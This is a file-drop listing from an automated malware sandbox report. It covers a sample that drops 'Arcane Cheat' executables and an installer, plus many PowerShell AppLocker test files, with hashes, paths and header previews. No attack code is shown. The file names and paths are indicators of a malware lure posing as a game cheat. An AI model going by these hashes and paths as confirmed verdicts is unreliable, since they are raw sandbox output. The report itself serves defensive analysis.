                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\browserwinsvc.exe.log

                                Download File
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1830
                                Entropy (8bit):5.3661116947161815
                                Encrypted:false
                                SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpvJHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpBGqZ8
                                MD5:498D8CC0F157AA5168D6679E694BD803
                                SHA1:05A8C750A8FC7F3438945EC9607C4F240917C31B
                                SHA-256:5A452026BD10A826A716DD6A5B5D7D731458217CD89CD9F24FFC5A52AE6CD35F
                                SHA-512:9924A15F7EC4B178E0C7B2BA6CDA7D26787372E63C49B66019D13696C14BFA3AADD2A597416E3589CE8B3F6AB4C9EE32A8BAA7C66ADDEA7A09C78B90B33CC893
                                Malicious:false
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\explorer.exe.log

                                Download File
                                Process:C:\Recovery\explorer.exe
                                File Type:CSV text
                                Category:dropped
                                Size (bytes):1281
                                Entropy (8bit):5.370111951859942
                                Encrypted:false
                                SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                MD5:12C61586CD59AA6F2A21DF30501F71BD
                                SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                Malicious:false
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):1.1940658735648508
                                Encrypted:false
                                SSDEEP:3:NlllulJnp/p:NllU
                                MD5:BC6DB77EB243BF62DC31267706650173
                                SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                Malicious:false
                                Preview:@...e.................................X..............@..........

                                C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe

                                Download File
                                Process:C:\Users\user\Desktop\uChcvn3L6R.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):1771706
                                Entropy (8bit):7.170972177500406
                                Encrypted:false
                                SSDEEP:24576:L2G/nvxW3WQgkxKXTRDwHzIPaJh8ux5LPP0ygQ9lykn4uNXXpDrmbVm+Gf:LbA3Nx0Xexpx5LkzQ9lT1NJDruTo
                                MD5:593631A643AA6AB0AF08189773812E6D
                                SHA1:6004DFE157F5BE08B4591819BC7F76B5B12A08D9
                                SHA-256:DA0500DB781CE974A0C4D9B6F245D2302F90DC932D23402D1441E3D5C77C6CD4
                                SHA-512:057B00AA42A3B2DA1DFAA646AA6BD0C8D9CDD3F34848F595B56AED2BF02F5D89092A7B2722BB24D3F860619FB305C994546EC6D43C6DA1EF2FA82ACC6CD5A643
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'...Rich&...................PE..L....._.....................6......@........0....@.......................................@......................... ...4...T...<....0...W......................h"......T............................U..@............0..`...... ....................text............................... ..`.rdata.......0......................@..@.data...(7..........................@....didat....... ......................@....rsrc....W...0...X..................@..@.reloc..h".......$...(..............@..B........................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe

                                Download File
                                Process:C:\Users\user\Desktop\uChcvn3L6R.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):46950613
                                Entropy (8bit):7.999892667043701
                                Encrypted:true
                                SSDEEP:786432:CNu/WmUoEqtPbDiTr+LykgDYGUvqptKaQ393283Ka3rPJHE2NOAshK:DUoEqtfiTAIldpt435x3rjs4
                                MD5:81E98D594505E0008D35FF1E1D2E4E41
                                SHA1:D1852F516C8FFB87CA8A7E8146EAFCD8D8A57369
                                SHA-256:152DBB49FB78F6DAA7FF14B44EA558E5164041CD7FE8A372E41A6D9F0D382512
                                SHA-512:F9E4A531D5BA36D9924F0FA230BDA219E17BACADC0C6A0E9A4F0CC96F96FF92A775CF33A5FD81291165FA36C0031D16EFBDF8BB4C499E20EBBCD30E60E515930
                                Malicious:false
                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......U..................................... ....@..............................................@...................................................................................................................................................text...4........................... ..`.itext..D........................... ..`.data........ ......................@....bss.....V...0...........................idata..............................@....tls.....................................rdata..............................@..@.rsrc................ ..............@..@....................................@..@........................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_03oywmg4.lds.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0x2tcaoz.2qk.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2xbfeqj4.jig.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3gm0k5gp.al2.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3kjj3tm5.wfs.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3shhf1hw.ie3.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4odaopsr.ucv.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a0zkugfo.yfw.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_alxozhwx.vtx.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d0yk53bt.lvx.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dy0z2z5d.gp5.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fv1mqlap.f1c.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iqqeovwe.h2z.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iz0dqzkz.ugp.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n23qz2hd.gxc.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nguu5n1u.lp3.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_njpr3is0.cce.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y5riyp5m.zlp.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yovzcxgy.q15.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zkvzyvhh.2dd.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\is-N4812.tmp\_isetup\_setup64.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                Category:dropped
                                Size (bytes):6144
                                Entropy (8bit):4.720366600008286
                                Encrypted:false
                                SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\is-N4812.tmp\_isetup\_shfoldr.dll

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                Category:dropped
                                Size (bytes):23312
                                Entropy (8bit):4.596242908851566
                                Encrypted:false
                                SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe
